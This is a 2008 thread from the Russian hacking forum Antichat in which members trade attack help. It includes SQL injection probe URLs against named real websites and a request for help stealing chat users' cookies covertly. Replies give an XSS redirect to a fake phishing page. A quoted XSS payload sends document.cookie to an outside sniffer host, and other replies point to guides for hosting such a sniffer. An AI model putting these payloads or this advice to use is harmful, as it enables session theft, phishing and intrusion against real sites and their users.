HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 24.03.2008, 19:36
samarin
Участник форума
Регистрация: 24.02.2008
Сообщений: 136
С нами: 9584577

Репутация: 69
По умолчанию

Я такого еще не встречал,может кто подскажет
при запросе, например:
Цитата:
http://www.stroyfarfor.com/catalog?c_dept_id=4&c_good_id=14+order+by+10000/*
выплевывает очень интересную ошибку
------------------------------------------------------
и такое, не первый раз встречаю
Цитата:
http://www.vera-tour.ru/event/show.phtml?show=`
что это может быть?
 
Ответить с цитированием

  #2  
Старый 24.03.2008, 19:48
Buffalon
Постоянный
Регистрация: 22.03.2008
Сообщений: 325
С нами: 9545988

Репутация: 63
По умолчанию

Здрасти.Извините я сильно новичок... .Вот нашол я в чате багу с Xss/
Как написать мне что бы куки без палева переходили на мыло или на сайт.. .И плиз можете кинуть ссылку на тему типа"Что можно сделать с багой в Xss"
 
Ответить с цитированием

  #3  
Старый 24.03.2008, 19:52
ReVOLVeR
Участник форума
Регистрация: 02.09.2006
Сообщений: 176
С нами: 10362626

Репутация: 327
По умолчанию

samarin по первой ссылке это называется те со скулей облом
по второй те вообще выдало все поля бд E_FATAL_NOSACHOBJ тут тоже не инжэкт а апросто ашибка самой базы

Последний раз редактировалось ReVOLVeR; 24.03.2008 в 19:58..
 
Ответить с цитированием

  #4  
Старый 24.03.2008, 19:56
ReVOLVeR
Участник форума
Регистрация: 02.09.2006
Сообщений: 176
С нами: 10362626

Репутация: 327
По умолчанию

Buffalon
_http://forum.antichat.ru/thread20140.html
 
Ответить с цитированием

  #5  
Старый 24.03.2008, 20:06
MaSter GeN
Познающий
Регистрация: 26.01.2008
Сообщений: 71
С нами: 9626078

Репутация: 141
По умолчанию

2Buffalon
попробуй вот так сделай фейк этой страницы либо ручками либо через anyfake воткни на хостинг и воткнить в xss такой :
Код:
<script type="text/javascript">window.top.location = "http://путь ктвоему фейку";</script>
что собствеено откроет в этом же окне твой фейк !ссылка на почитати выше
 
Ответить с цитированием

  #6  
Старый 24.03.2008, 22:14
xcedz
Познавший АНТИЧАТ
Регистрация: 14.01.2008
Сообщений: 1,165
С нами: 9644006

Репутация: 3099


По умолчанию

Скачай хотя бы видео тогда, ну или журнал например хакер почитай там какой то спец номер вроде был про xss (хотя мож ошибаюсь) =\ Да и на античате много статей ничуть не хуже чем в журналах.. вот прочитай все проанализируй.

Последний раз редактировалось xcedz; 24.03.2008 в 22:28..
 
Ответить с цитированием

  #7  
Старый 25.03.2008, 01:37
samarin
Участник форума
Регистрация: 24.02.2008
Сообщений: 136
С нами: 9584577

Репутация: 69
По умолчанию

нужна помощь в xss, пытаюсь изучать, но много непонятных мелочей.
предположим нужная мне xss
Цитата:
'><script>img = new Image();img.src="http://antichat.org/s/HakNet.gif?"+document.cookie;</script>
насколько я смог понять куки записываются в картику hacknet.gif, т.е у меня должен быть свой сайт с картинкой, которую разрешено изменять на этом сайте без авторизации?или неправильно понял?
Думаю идея вопроса более-менее понятна.
Разъясните мне пожалуйста эти детали
 
Ответить с цитированием

  #8  
Старый 25.03.2008, 01:41
159932
Постоянный
Регистрация: 28.09.2007
Сообщений: 820
С нами: 9799586

Репутация: 1385


По умолчанию

нет это просто ссылка на сниффер
 
Ответить с цитированием

  #9  
Старый 25.03.2008, 01:52
samarin
Участник форума
Регистрация: 24.02.2008
Сообщений: 136
С нами: 9584577

Репутация: 69
По умолчанию

собственно сам вопрос
Цитата:
http://forum.antichat.ru/showpost.php?p=632546&postcount=1410
Цитата:
нет это просто ссылка на сниффер
ок, где взять этот снифер, как и где его разестить?
---------------------------------------------------------------------
разьясните пожалуйста детали про получение куков
 
Ответить с цитированием

  #10  
Старый 25.03.2008, 02:47
Sharingan
Участник форума
Регистрация: 05.05.2007
Сообщений: 171
С нами: 10009826

Репутация: 435
По умолчанию

_http://forum.antichat.ru/thread18555.html поиском пользоваться не барское дело?
Вот собственно помощ по гринбировскому сниферу
_http://forum.antichat.ru/thread36829.html
все понятно написано
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.